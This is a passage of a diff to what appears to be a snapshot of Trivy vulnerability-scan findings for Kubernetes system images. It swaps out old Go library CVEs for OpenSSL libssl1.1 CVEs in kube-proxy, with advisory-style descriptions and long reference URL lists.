"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.2", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-3121", - "installedVersion": "v1.3.1", - "packageName": "github.com/gogo/protobuf", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3121", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", - "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", - "https://github.com/advisories/GHSA-c3h9-896r-86jm", - "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", - "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", - "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", - "https://pkg.go.dev/vuln/GO-2021-0053", - "https://security.netapp.com/advisory/ntap-20210219-0006/", - "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3121", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3121", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0053", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.8.0", - "packageName": "github.com/prometheus/client_golang", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", - ], - }, - "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": 